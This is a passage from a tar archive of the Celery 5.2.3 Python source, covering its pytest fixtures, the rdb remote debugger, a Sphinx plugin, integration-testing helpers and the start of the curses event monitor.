}) """ def task_name_in_map(body, message): return map.get(body['task']) # <- name of task return move(task_name_in_map, **kwargs) def filter_status(state, body, message, **kwargs): print(MOVING_PROGRESS_FMT.format(state=state, body=body, **kwargs)) move_direct = partial(move, transform=worker_direct) move_direct_by_id = partial(move_task_by_id, transform=worker_direct) move_direct_by_idmap = partial(move_by_idmap, transform=worker_direct) move_direct_by_taskmap = partial(move_by_taskmap, transform=worker_direct) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/contrib/pytest.py0000664000175000017500000001513300000000000017525 0ustar00asifasif00000000000000"""Fixtures and testing utilities for :pypi:`pytest `.""" import os from contextlib import contextmanager from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union import pytest if TYPE_CHECKING: from celery import Celery from ..worker import WorkController else: Celery = WorkController = object NO_WORKER = os.environ.get('NO_WORKER') # pylint: disable=redefined-outer-name # Well, they're called fixtures.... def pytest_configure(config): """Register additional pytest configuration.""" # add the pytest.mark.celery() marker registration to the pytest.ini [markers] section # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker # and shows helpful marker documentation when running pytest --markers. config.addinivalue_line( "markers", "celery(**overrides): override celery configuration for a test case" ) @contextmanager def _create_app(enable_logging=False, use_trap=False, parameters=None, **config): # type: (Any, Any, Any, **Any) -> Celery """Utility context used to setup Celery app for pytest fixtures.""" from .testing.app import TestApp, setup_default_app parameters = {} if not parameters else parameters test_app = TestApp( set_as_current=False, enable_logging=enable_logging, config=config, **parameters ) with setup_default_app(test_app, use_trap=use_trap): yield test_app @pytest.fixture(scope='session') def use_celery_app_trap(): # type: () -> bool """You can override this fixture to enable the app trap. The app trap raises an exception whenever something attempts to use the current or default apps. """ return False @pytest.fixture(scope='session') def celery_session_app(request, celery_config, celery_parameters, celery_enable_logging, use_celery_app_trap): # type: (Any, Any, Any, Any, Any) -> Celery """Session Fixture: Return app for session fixtures.""" mark = request.node.get_closest_marker('celery') config = dict(celery_config, **mark.kwargs if mark else {}) with _create_app(enable_logging=celery_enable_logging, use_trap=use_celery_app_trap, parameters=celery_parameters, **config) as app: if not use_celery_app_trap: app.set_default() app.set_current() yield app @pytest.fixture(scope='session') def celery_session_worker( request, # type: Any celery_session_app, # type: Celery celery_includes, # type: Sequence[str] celery_class_tasks, # type: str celery_worker_pool, # type: Any celery_worker_parameters, # type: Mapping[str, Any] ): # type: (...) 
-> WorkController """Session Fixture: Start worker that lives throughout test suite.""" from .testing import worker if not NO_WORKER: for module in celery_includes: celery_session_app.loader.import_task_module(module) for class_task in celery_class_tasks: celery_session_app.tasks.register(class_task) with worker.start_worker(celery_session_app, pool=celery_worker_pool, **celery_worker_parameters) as w: yield w @pytest.fixture(scope='session') def celery_enable_logging(): # type: () -> bool """You can override this fixture to enable logging.""" return False @pytest.fixture(scope='session') def celery_includes(): # type: () -> Sequence[str] """You can override this include modules when a worker start. You can have this return a list of module names to import, these can be task modules, modules registering signals, and so on. """ return () @pytest.fixture(scope='session') def celery_worker_pool(): # type: () -> Union[str, Any] """You can override this fixture to set the worker pool. The "solo" pool is used by default, but you can set this to return e.g. "prefork". """ return 'solo' @pytest.fixture(scope='session') def celery_config(): # type: () -> Mapping[str, Any] """Redefine this fixture to configure the test Celery app. The config returned by your fixture will then be used to configure the :func:`celery_app` fixture. """ return {} @pytest.fixture(scope='session') def celery_parameters(): # type: () -> Mapping[str, Any] """Redefine this fixture to change the init parameters of test Celery app. The dict returned by your fixture will then be used as parameters when instantiating :class:`~celery.Celery`. """ return {} @pytest.fixture(scope='session') def celery_worker_parameters(): # type: () -> Mapping[str, Any] """Redefine this fixture to change the init parameters of Celery workers. This can be used e. g. to define queues the worker will consume tasks from. The dict returned by your fixture will then be used as parameters when instantiating :class:`~celery.worker.WorkController`. """ return {} @pytest.fixture() def celery_app(request, celery_config, celery_parameters, celery_enable_logging, use_celery_app_trap): """Fixture creating a Celery application instance.""" mark = request.node.get_closest_marker('celery') config = dict(celery_config, **mark.kwargs if mark else {}) with _create_app(enable_logging=celery_enable_logging, use_trap=use_celery_app_trap, parameters=celery_parameters, **config) as app: yield app @pytest.fixture(scope='session') def celery_class_tasks(): """Redefine this fixture to register tasks with the test Celery app.""" return [] @pytest.fixture() def celery_worker(request, celery_app, celery_includes, celery_worker_pool, celery_worker_parameters): # type: (Any, Celery, Sequence[str], str, Any) -> WorkController """Fixture: Start worker in a thread, stop it when the test returns.""" from .testing import worker if not NO_WORKER: for module in celery_includes: celery_app.loader.import_task_module(module) with worker.start_worker(celery_app, pool=celery_worker_pool, **celery_worker_parameters) as w: yield w @pytest.fixture() def depends_on_current_app(celery_app): """Fixture that sets app as current.""" celery_app.set_current() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/rdb.py0000664000175000017500000001163700000000000016751 0ustar00asifasif00000000000000"""Remote Debugger. 
Introduction ============ This is a remote debugger for Celery tasks running in multiprocessing pool workers. Inspired by a lost post on dzone.com. Usage ----- .. code-block:: python from celery.contrib import rdb from celery import task @task() def add(x, y): result = x + y rdb.set_trace() return result Environment Variables ===================== .. envvar:: CELERY_RDB_HOST ``CELERY_RDB_HOST`` ------------------- Hostname to bind to. Default is '127.0.0.1' (only accessible from localhost). .. envvar:: CELERY_RDB_PORT ``CELERY_RDB_PORT`` ------------------- Base port to bind to. Default is 6899. The debugger will try to find an available port starting from the base port. The selected port will be logged by the worker. """ import errno import os import socket import sys from pdb import Pdb from billiard.process import current_process __all__ = ( 'CELERY_RDB_HOST', 'CELERY_RDB_PORT', 'DEFAULT_PORT', 'Rdb', 'debugger', 'set_trace', ) DEFAULT_PORT = 6899 CELERY_RDB_HOST = os.environ.get('CELERY_RDB_HOST') or '127.0.0.1' CELERY_RDB_PORT = int(os.environ.get('CELERY_RDB_PORT') or DEFAULT_PORT) #: Holds the currently active debugger. _current = [None] _frame = getattr(sys, '_getframe') NO_AVAILABLE_PORT = """\ {self.ident}: Couldn't find an available port. Please specify one using the CELERY_RDB_PORT environment variable. """ BANNER = """\ {self.ident}: Ready to connect: telnet {self.host} {self.port} Type `exit` in session to continue. {self.ident}: Waiting for client... """ SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.' SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.' class Rdb(Pdb): """Remote debugger.""" me = 'Remote Debugger' _prev_outs = None _sock = None def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT, port_search_limit=100, port_skew=+0, out=sys.stdout): self.active = True self.out = out self._prev_handles = sys.stdin, sys.stdout self._sock, this_port = self.get_avail_port( host, port, port_search_limit, port_skew, ) self._sock.setblocking(1) self._sock.listen(1) self.ident = f'{self.me}:{this_port}' self.host = host self.port = this_port self.say(BANNER.format(self=self)) self._client, address = self._sock.accept() self._client.setblocking(1) self.remote_addr = ':'.join(str(v) for v in address) self.say(SESSION_STARTED.format(self=self)) self._handle = sys.stdin = sys.stdout = self._client.makefile('rw') super().__init__(completekey='tab', stdin=self._handle, stdout=self._handle) def get_avail_port(self, host, port, search_limit=100, skew=+0): try: _, skew = current_process().name.split('-') skew = int(skew) except ValueError: pass this_port = None for i in range(search_limit): _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) _sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) this_port = port + skew + i try: _sock.bind((host, this_port)) except OSError as exc: if exc.errno in [errno.EADDRINUSE, errno.EINVAL]: continue raise else: return _sock, this_port else: raise Exception(NO_AVAILABLE_PORT.format(self=self)) def say(self, m): print(m, file=self.out) def __enter__(self): return self def __exit__(self, *exc_info): self._close_session() def _close_session(self): self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles if self.active: if self._handle is not None: self._handle.close() if self._client is not None: self._client.close() if self._sock is not None: self._sock.close() self.active = False self.say(SESSION_ENDED.format(self=self)) def do_continue(self, arg): self._close_session() 
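# _close_session() restores sys.stdin/sys.stdout and closes the client socket
# before execution resumes; returning a true value ends the Pdb command loop
# for this prompt.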
self.set_continue() return 1 do_c = do_cont = do_continue def do_quit(self, arg): self._close_session() self.set_quit() return 1 do_q = do_exit = do_quit def set_quit(self): # this raises a BdbQuit exception that we're unable to catch. sys.settrace(None) def debugger(): """Return the current debugger instance, or create if none.""" rdb = _current[0] if rdb is None or not rdb.active: rdb = _current[0] = Rdb() return rdb def set_trace(frame=None): """Set break-point at current location, or a specified frame.""" if frame is None: frame = _frame().f_back return debugger().set_trace(frame) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/sphinx.py0000664000175000017500000000652200000000000017510 0ustar00asifasif00000000000000"""Sphinx documentation plugin used to document tasks. Introduction ============ Usage ----- The Celery extension for Sphinx requires Sphinx 2.0 or later. Add the extension to your :file:`docs/conf.py` configuration module: .. code-block:: python extensions = (..., 'celery.contrib.sphinx') If you'd like to change the prefix for tasks in reference documentation then you can change the ``celery_task_prefix`` configuration value: .. code-block:: python celery_task_prefix = '(task)' # < default With the extension installed `autodoc` will automatically find task decorated objects (e.g. when using the automodule directive) and generate the correct (as well as add a ``(task)`` prefix), and you can also refer to the tasks using `:task:proj.tasks.add` syntax. Use ``.. autotask::`` to alternatively manually document a task. """ from inspect import formatargspec, getfullargspec from sphinx.domains.python import PyFunction from sphinx.ext.autodoc import FunctionDocumenter from celery.app.task import BaseTask class TaskDocumenter(FunctionDocumenter): """Document task definitions.""" objtype = 'task' member_order = 11 @classmethod def can_document_member(cls, member, membername, isattr, parent): return isinstance(member, BaseTask) and getattr(member, '__wrapped__') def format_args(self): wrapped = getattr(self.object, '__wrapped__', None) if wrapped is not None: argspec = getfullargspec(wrapped) if argspec[0] and argspec[0][0] in ('cls', 'self'): del argspec[0][0] fmt = formatargspec(*argspec) fmt = fmt.replace('\\', '\\\\') return fmt return '' def document_members(self, all_members=False): pass def check_module(self): # Normally checks if *self.object* is really defined in the module # given by *self.modname*. But since functions decorated with the @task # decorator are instances living in the celery.local, we have to check # the wrapped function instead. wrapped = getattr(self.object, '__wrapped__', None) if wrapped and getattr(wrapped, '__module__') == self.modname: return True return super().check_module() class TaskDirective(PyFunction): """Sphinx task directive.""" def get_signature_prefix(self, sig): return self.env.config.celery_task_prefix def autodoc_skip_member_handler(app, what, name, obj, skip, options): """Handler for autodoc-skip-member event.""" # Celery tasks created with the @task decorator have the property # that *obj.__doc__* and *obj.__class__.__doc__* are equal, which # trips up the logic in sphinx.ext.autodoc that is supposed to # suppress repetition of class documentation in an instance of the # class. This overrides that behavior. 
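# Returning False tells autodoc to keep (not skip) the member; returning None
# defers the decision to other handlers or to the default behaviour.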
if isinstance(obj, BaseTask) and getattr(obj, '__wrapped__'): if skip: return False return None def setup(app): """Setup Sphinx extension.""" app.setup_extension('sphinx.ext.autodoc') app.add_autodocumenter(TaskDocumenter) app.add_directive_to_domain('py', 'task', TaskDirective) app.add_config_value('celery_task_prefix', '(task)', True) app.connect('autodoc-skip-member', autodoc_skip_member_handler) return { 'parallel_read_safe': True } ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4477506 celery-5.2.3/celery/contrib/testing/0000775000175000017500000000000000000000000017275 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/__init__.py0000664000175000017500000000000000000000000021374 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/app.py0000664000175000017500000000571100000000000020433 0ustar00asifasif00000000000000"""Create Celery app instances used for testing.""" import weakref from contextlib import contextmanager from copy import deepcopy from kombu.utils.imports import symbol_by_name from celery import Celery, _state #: Contains the default configuration values for the test app. DEFAULT_TEST_CONFIG = { 'worker_hijack_root_logger': False, 'worker_log_color': False, 'accept_content': {'json'}, 'enable_utc': True, 'timezone': 'UTC', 'broker_url': 'memory://', 'result_backend': 'cache+memory://', 'broker_heartbeat': 0, } class Trap: """Trap that pretends to be an app but raises an exception instead. This to protect from code that does not properly pass app instances, then falls back to the current_app. """ def __getattr__(self, name): # Workaround to allow unittest.mock to patch this object # in Python 3.8 and above. if name == '_is_coroutine' or name == '__func__': return None print(name) raise RuntimeError('Test depends on current_app') class UnitLogging(symbol_by_name(Celery.log_cls)): """Sets up logging for the test application.""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.already_setup = True def TestApp(name=None, config=None, enable_logging=False, set_as_current=False, log=UnitLogging, backend=None, broker=None, **kwargs): """App used for testing.""" from . import tasks # noqa config = dict(deepcopy(DEFAULT_TEST_CONFIG), **config or {}) if broker is not None: config.pop('broker_url', None) if backend is not None: config.pop('result_backend', None) log = None if enable_logging else log test_app = Celery( name or 'celery.tests', set_as_current=set_as_current, log=log, broker=broker, backend=backend, **kwargs) test_app.add_defaults(config) return test_app @contextmanager def set_trap(app): """Contextmanager that installs the trap app. The trap means that anything trying to use the current or default app will raise an exception. """ trap = Trap() prev_tls = _state._tls _state.set_default_app(trap) class NonTLS: current_app = trap _state._tls = NonTLS() yield _state._tls = prev_tls @contextmanager def setup_default_app(app, use_trap=False): """Setup default app for testing. Ensures state is clean after the test returns. 
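Example (a minimal, illustrative sketch; the configuration value shown is
not required by this helper):

.. code-block:: python

    app = TestApp(config={'task_always_eager': True})
    with setup_default_app(app, use_trap=True):
        ...  # code under test; anything falling back to the
        ...  # current/default app raises RuntimeError here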
""" prev_current_app = _state.get_current_app() prev_default_app = _state.default_app prev_finalizers = set(_state._on_app_finalizers) prev_apps = weakref.WeakSet(_state._apps) if use_trap: with set_trap(app): yield else: yield _state.set_default_app(prev_default_app) _state._tls.current_app = prev_current_app if app is not prev_current_app: app.close() _state._on_app_finalizers = prev_finalizers _state._apps = prev_apps ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/manager.py0000664000175000017500000001705300000000000021267 0ustar00asifasif00000000000000"""Integration testing utilities.""" import socket import sys from collections import defaultdict from functools import partial from itertools import count from typing import Any, Callable, Dict, Sequence, TextIO, Tuple from kombu.utils.functional import retry_over_time from celery import states from celery.exceptions import TimeoutError from celery.result import AsyncResult, ResultSet from celery.utils.text import truncate from celery.utils.time import humanize_seconds as _humanize_seconds E_STILL_WAITING = 'Still waiting for {0}. Trying again {when}: {exc!r}' humanize_seconds = partial(_humanize_seconds, microseconds=True) class Sentinel(Exception): """Signifies the end of something.""" class ManagerMixin: """Mixin that adds :class:`Manager` capabilities.""" def _init_manager(self, block_timeout=30 * 60.0, no_join=False, stdout=None, stderr=None): # type: (float, bool, TextIO, TextIO) -> None self.stdout = sys.stdout if stdout is None else stdout self.stderr = sys.stderr if stderr is None else stderr self.connerrors = self.app.connection().recoverable_connection_errors self.block_timeout = block_timeout self.no_join = no_join def remark(self, s, sep='-'): # type: (str, str) -> None print(f'{sep}{s}', file=self.stdout) def missing_results(self, r): # type: (Sequence[AsyncResult]) -> Sequence[str] return [res.id for res in r if res.id not in res.backend._cache] def wait_for( self, fun, # type: Callable catch, # type: Sequence[Any] desc="thing", # type: str args=(), # type: Tuple kwargs=None, # type: Dict errback=None, # type: Callable max_retries=10, # type: int interval_start=0.1, # type: float interval_step=0.5, # type: float interval_max=5.0, # type: float emit_warning=False, # type: bool **options # type: Any ): # type: (...) -> Any """Wait for event to happen. The `catch` argument specifies the exception that means the event has not happened yet. 
""" kwargs = {} if not kwargs else kwargs def on_error(exc, intervals, retries): interval = next(intervals) if emit_warning: self.warn(E_STILL_WAITING.format( desc, when=humanize_seconds(interval, 'in', ' '), exc=exc, )) if errback: errback(exc, interval, retries) return interval return self.retry_over_time( fun, catch, args=args, kwargs=kwargs, errback=on_error, max_retries=max_retries, interval_start=interval_start, interval_step=interval_step, **options ) def ensure_not_for_a_while(self, fun, catch, desc='thing', max_retries=20, interval_start=0.1, interval_step=0.02, interval_max=1.0, emit_warning=False, **options): """Make sure something does not happen (at least for a while).""" try: return self.wait_for( fun, catch, desc=desc, max_retries=max_retries, interval_start=interval_start, interval_step=interval_step, interval_max=interval_max, emit_warning=emit_warning, ) except catch: pass else: raise AssertionError(f'Should not have happened: {desc}') def retry_over_time(self, *args, **kwargs): return retry_over_time(*args, **kwargs) def join(self, r, propagate=False, max_retries=10, **kwargs): if self.no_join: return if not isinstance(r, ResultSet): r = self.app.ResultSet([r]) received = [] def on_result(task_id, value): received.append(task_id) for i in range(max_retries) if max_retries else count(0): received[:] = [] try: return r.get(callback=on_result, propagate=propagate, **kwargs) except (socket.timeout, TimeoutError) as exc: waiting_for = self.missing_results(r) self.remark( 'Still waiting for {}/{}: [{}]: {!r}'.format( len(r) - len(received), len(r), truncate(', '.join(waiting_for)), exc), '!', ) except self.connerrors as exc: self.remark(f'join: connection lost: {exc!r}', '!') raise AssertionError('Test failed: Missing task results') def inspect(self, timeout=3.0): return self.app.control.inspect(timeout=timeout) def query_tasks(self, ids, timeout=0.5): tasks = self.inspect(timeout).query_task(*ids) or {} yield from tasks.items() def query_task_states(self, ids, timeout=0.5): states = defaultdict(set) for hostname, reply in self.query_tasks(ids, timeout=timeout): for task_id, (state, _) in reply.items(): states[state].add(task_id) return states def assert_accepted(self, ids, interval=0.5, desc='waiting for tasks to be accepted', **policy): return self.assert_task_worker_state( self.is_accepted, ids, interval=interval, desc=desc, **policy ) def assert_received(self, ids, interval=0.5, desc='waiting for tasks to be received', **policy): return self.assert_task_worker_state( self.is_accepted, ids, interval=interval, desc=desc, **policy ) def assert_result_tasks_in_progress_or_completed( self, async_results, interval=0.5, desc='waiting for tasks to be started or completed', **policy ): return self.assert_task_state_from_result( self.is_result_task_in_progress, async_results, interval=interval, desc=desc, **policy ) def assert_task_state_from_result(self, fun, results, interval=0.5, **policy): return self.wait_for( partial(self.true_or_raise, fun, results, timeout=interval), (Sentinel,), **policy ) @staticmethod def is_result_task_in_progress(results, **kwargs): possible_states = (states.STARTED, states.SUCCESS) return all(result.state in possible_states for result in results) def assert_task_worker_state(self, fun, ids, interval=0.5, **policy): return self.wait_for( partial(self.true_or_raise, fun, ids, timeout=interval), (Sentinel,), **policy ) def is_received(self, ids, **kwargs): return self._ids_matches_state( ['reserved', 'active', 'ready'], ids, **kwargs) def 
is_accepted(self, ids, **kwargs): return self._ids_matches_state(['active', 'ready'], ids, **kwargs) def _ids_matches_state(self, expected_states, ids, timeout=0.5): states = self.query_task_states(ids, timeout=timeout) return all( any(t in s for s in [states[k] for k in expected_states]) for t in ids ) def true_or_raise(self, fun, *args, **kwargs): res = fun(*args, **kwargs) if not res: raise Sentinel() return res class Manager(ManagerMixin): """Test helpers for task integration tests.""" def __init__(self, app, **kwargs): self.app = app self._init_manager(**kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/contrib/testing/mocks.py0000664000175000017500000001007600000000000020767 0ustar00asifasif00000000000000"""Useful mocks for unit testing.""" import numbers from datetime import datetime, timedelta from typing import Any, Mapping, Sequence from unittest.mock import Mock from celery import Celery from celery.canvas import Signature def TaskMessage( name, # type: str id=None, # type: str args=(), # type: Sequence kwargs=None, # type: Mapping callbacks=None, # type: Sequence[Signature] errbacks=None, # type: Sequence[Signature] chain=None, # type: Sequence[Signature] shadow=None, # type: str utc=None, # type: bool **options # type: Any ): # type: (...) -> Any """Create task message in protocol 2 format.""" kwargs = {} if not kwargs else kwargs from kombu.serialization import dumps from celery import uuid id = id or uuid() message = Mock(name=f'TaskMessage-{id}') message.headers = { 'id': id, 'task': name, 'shadow': shadow, } embed = {'callbacks': callbacks, 'errbacks': errbacks, 'chain': chain} message.headers.update(options) message.content_type, message.content_encoding, message.body = dumps( (args, kwargs, embed), serializer='json', ) message.payload = (args, kwargs, embed) return message def TaskMessage1( name, # type: str id=None, # type: str args=(), # type: Sequence kwargs=None, # type: Mapping callbacks=None, # type: Sequence[Signature] errbacks=None, # type: Sequence[Signature] chain=None, # type: Sequence[Signature] **options # type: Any ): # type: (...) -> Any """Create task message in protocol 1 format.""" kwargs = {} if not kwargs else kwargs from kombu.serialization import dumps from celery import uuid id = id or uuid() message = Mock(name=f'TaskMessage-{id}') message.headers = {} message.payload = { 'task': name, 'id': id, 'args': args, 'kwargs': kwargs, 'callbacks': callbacks, 'errbacks': errbacks, } message.payload.update(options) message.content_type, message.content_encoding, message.body = dumps( message.payload, ) return message def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage): # type: (Celery, Signature, bool, Any) -> Any """Create task message from :class:`celery.Signature`. 
Example: >>> m = task_message_from_sig(app, add.s(2, 2)) >>> amqp_client.basic_publish(m, exchange='ex', routing_key='rkey') """ sig.freeze() callbacks = sig.options.pop('link', None) errbacks = sig.options.pop('link_error', None) countdown = sig.options.pop('countdown', None) if countdown: eta = app.now() + timedelta(seconds=countdown) else: eta = sig.options.pop('eta', None) if eta and isinstance(eta, datetime): eta = eta.isoformat() expires = sig.options.pop('expires', None) if expires and isinstance(expires, numbers.Real): expires = app.now() + timedelta(seconds=expires) if expires and isinstance(expires, datetime): expires = expires.isoformat() return TaskMessage( sig.task, id=sig.id, args=sig.args, kwargs=sig.kwargs, callbacks=[dict(s) for s in callbacks] if callbacks else None, errbacks=[dict(s) for s in errbacks] if errbacks else None, eta=eta, expires=expires, utc=utc, **sig.options ) class _ContextMock(Mock): """Dummy class implementing __enter__ and __exit__. The :keyword:`with` statement requires these to be implemented in the class, not just the instance. """ def __enter__(self): return self def __exit__(self, *exc_info): pass def ContextMock(*args, **kwargs): """Mock that mocks :keyword:`with` statement contexts.""" obj = _ContextMock(*args, **kwargs) obj.attach_mock(_ContextMock(), '__enter__') obj.attach_mock(_ContextMock(), '__exit__') obj.__enter__.return_value = obj # if __exit__ return a value the exception is ignored, # so it must return None here. obj.__exit__.return_value = None return obj ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/tasks.py0000664000175000017500000000032000000000000020767 0ustar00asifasif00000000000000"""Helper tasks for integration tests.""" from celery import shared_task @shared_task(name='celery.ping') def ping(): # type: () -> str """Simple task that just returns 'pong'.""" return 'pong' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/testing/worker.py0000664000175000017500000001270100000000000021161 0ustar00asifasif00000000000000"""Embedded workers for integration tests.""" import os import threading from contextlib import contextmanager from typing import Any, Iterable, Union import celery.worker.consumer from celery import Celery, worker from celery.result import _set_task_join_will_block, allow_join_result from celery.utils.dispatch import Signal from celery.utils.nodenames import anon_nodename WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error') test_worker_starting = Signal( name='test_worker_starting', providing_args={}, ) test_worker_started = Signal( name='test_worker_started', providing_args={'worker', 'consumer'}, ) test_worker_stopped = Signal( name='test_worker_stopped', providing_args={'worker'}, ) class TestWorkController(worker.WorkController): """Worker that can synchronize on being fully started.""" def __init__(self, *args, **kwargs): # type: (*Any, **Any) -> None self._on_started = threading.Event() super().__init__(*args, **kwargs) def on_consumer_ready(self, consumer): # type: (celery.worker.consumer.Consumer) -> None """Callback called when the Consumer blueprint is fully started.""" self._on_started.set() test_worker_started.send( sender=self.app, worker=self, consumer=consumer) def ensure_started(self): # type: () -> None """Wait for worker to be fully up and running. 
Warning: Worker must be started within a thread for this to work, or it will block forever. """ self._on_started.wait() @contextmanager def start_worker( app, # type: Celery concurrency=1, # type: int pool='solo', # type: str loglevel=WORKER_LOGLEVEL, # type: Union[str, int] logfile=None, # type: str perform_ping_check=True, # type: bool ping_task_timeout=10.0, # type: float shutdown_timeout=10.0, # type: float **kwargs # type: Any ): # type: (...) -> Iterable """Start embedded worker. Yields: celery.app.worker.Worker: worker instance. """ test_worker_starting.send(sender=app) with _start_worker_thread(app, concurrency=concurrency, pool=pool, loglevel=loglevel, logfile=logfile, perform_ping_check=perform_ping_check, shutdown_timeout=shutdown_timeout, **kwargs) as worker: if perform_ping_check: from .tasks import ping with allow_join_result(): assert ping.delay().get(timeout=ping_task_timeout) == 'pong' yield worker test_worker_stopped.send(sender=app, worker=worker) @contextmanager def _start_worker_thread(app, concurrency=1, pool='solo', loglevel=WORKER_LOGLEVEL, logfile=None, WorkController=TestWorkController, perform_ping_check=True, shutdown_timeout=10.0, **kwargs): # type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable """Start Celery worker in a thread. Yields: celery.worker.Worker: worker instance. """ setup_app_for_worker(app, loglevel, logfile) if perform_ping_check: assert 'celery.ping' in app.tasks # Make sure we can connect to the broker with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn: conn.default_channel.queue_declare worker = WorkController( app=app, concurrency=concurrency, hostname=anon_nodename(), pool=pool, loglevel=loglevel, logfile=logfile, # not allowed to override TestWorkController.on_consumer_ready ready_callback=None, without_heartbeat=kwargs.pop("without_heartbeat", True), without_mingle=True, without_gossip=True, **kwargs) t = threading.Thread(target=worker.start, daemon=True) t.start() worker.ensure_started() _set_task_join_will_block(False) yield worker from celery.worker import state state.should_terminate = 0 t.join(shutdown_timeout) if t.is_alive(): raise RuntimeError( "Worker thread failed to exit within the allocated timeout. " "Consider raising `shutdown_timeout` if your tasks take longer " "to execute." ) state.should_terminate = None @contextmanager def _start_worker_process(app, concurrency=1, pool='solo', loglevel=WORKER_LOGLEVEL, logfile=None, **kwargs): # type (Celery, int, str, Union[int, str], str, **Any) -> Iterable """Start worker in separate process. Yields: celery.app.worker.Worker: worker instance. 
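Note: tests normally use the public :func:`start_worker` context manager
instead.  A minimal sketch (``app`` and the ``add`` task are assumed to
exist):

.. code-block:: python

    with start_worker(app, pool='solo', perform_ping_check=False):
        assert add.delay(2, 2).get(timeout=10) == 4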
""" from celery.apps.multi import Cluster, Node app.set_current() cluster = Cluster([Node('testworker1@%h')]) cluster.start() yield cluster.stopwait() def setup_app_for_worker(app, loglevel, logfile): # type: (Celery, Union[str, int], str) -> None """Setup the app to be used for starting an embedded worker.""" app.finalize() app.set_current() app.set_default() type(app.log)._setup = False app.log.setup(loglevel=loglevel, logfile=logfile) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4557507 celery-5.2.3/celery/events/0000775000175000017500000000000000000000000015464 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/__init__.py0000664000175000017500000000073500000000000017602 0ustar00asifasif00000000000000"""Monitoring Event Receiver+Dispatcher. Events is a stream of messages sent for certain actions occurring in the worker (and clients if :setting:`task_send_sent_event` is enabled), used for monitoring purposes. """ from .dispatcher import EventDispatcher from .event import Event, event_exchange, get_exchange, group_from from .receiver import EventReceiver __all__ = ( 'Event', 'EventDispatcher', 'EventReceiver', 'event_exchange', 'get_exchange', 'group_from', ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/cursesmon.py0000664000175000017500000004316500000000000020065 0ustar00asifasif00000000000000"""Graphical monitor of Celery events using curses.""" import curses import sys import threading from datetime import datetime from itertools import count from math import ceil from textwrap import wrap from time import time from celery import VERSION_BANNER, states from celery.app import app_or_default from celery.utils.text import abbr, abbrtask __all__ = ('CursesMonitor', 'evtop') BORDER_SPACING = 4 LEFT_BORDER_OFFSET = 3 UUID_WIDTH = 36 STATE_WIDTH = 8 TIMESTAMP_WIDTH = 8 MIN_WORKER_WIDTH = 15 MIN_TASK_WIDTH = 16 # this module is considered experimental # we don't care about coverage. 
STATUS_SCREEN = """\ events: {s.event_count} tasks:{s.task_count} workers:{w_alive}/{w_all} """ class CursesMonitor: # pragma: no cover """A curses based Celery task monitor.""" keymap = {} win = None screen_delay = 10 selected_task = None selected_position = 0 selected_str = 'Selected: ' foreground = curses.COLOR_BLACK background = curses.COLOR_WHITE online_str = 'Workers online: ' help_title = 'Keys: ' help = ('j:down k:up i:info t:traceback r:result c:revoke ^c: quit') greet = f'celery events {VERSION_BANNER}' info_str = 'Info: ' def __init__(self, state, app, keymap=None): self.app = app self.keymap = keymap or self.keymap self.state = state default_keymap = { 'J': self.move_selection_down, 'K': self.move_selection_up, 'C': self.revoke_selection, 'T': self.selection_traceback, 'R': self.selection_result, 'I': self.selection_info, 'L': self.selection_rate_limit, } self.keymap = dict(default_keymap, **self.keymap) self.lock = threading.RLock() def format_row(self, uuid, task, worker, timestamp, state): mx = self.display_width # include spacing detail_width = mx - 1 - STATE_WIDTH - 1 - TIMESTAMP_WIDTH uuid_space = detail_width - 1 - MIN_TASK_WIDTH - 1 - MIN_WORKER_WIDTH if uuid_space < UUID_WIDTH: uuid_width = uuid_space else: uuid_width = UUID_WIDTH detail_width = detail_width - uuid_width - 1 task_width = int(ceil(detail_width / 2.0)) worker_width = detail_width - task_width - 1 uuid = abbr(uuid, uuid_width).ljust(uuid_width) worker = abbr(worker, worker_width).ljust(worker_width) task = abbrtask(task, task_width).ljust(task_width) state = abbr(state, STATE_WIDTH).ljust(STATE_WIDTH) timestamp = timestamp.ljust(TIMESTAMP_WIDTH) row = f'{uuid} {worker} {task} {timestamp} {state} ' if self.screen_width is None: self.screen_width = len(row[:mx]) return row[:mx] @property def screen_width(self): _, mx = self.win.getmaxyx() return mx @property def screen_height(self): my, _ = self.win.getmaxyx() return my @property def display_width(self): _, mx = self.win.getmaxyx() return mx - BORDER_SPACING @property def display_height(self): my, _ = self.win.getmaxyx() return my - 10 @property def limit(self): return self.display_height def find_position(self): if not self.tasks: 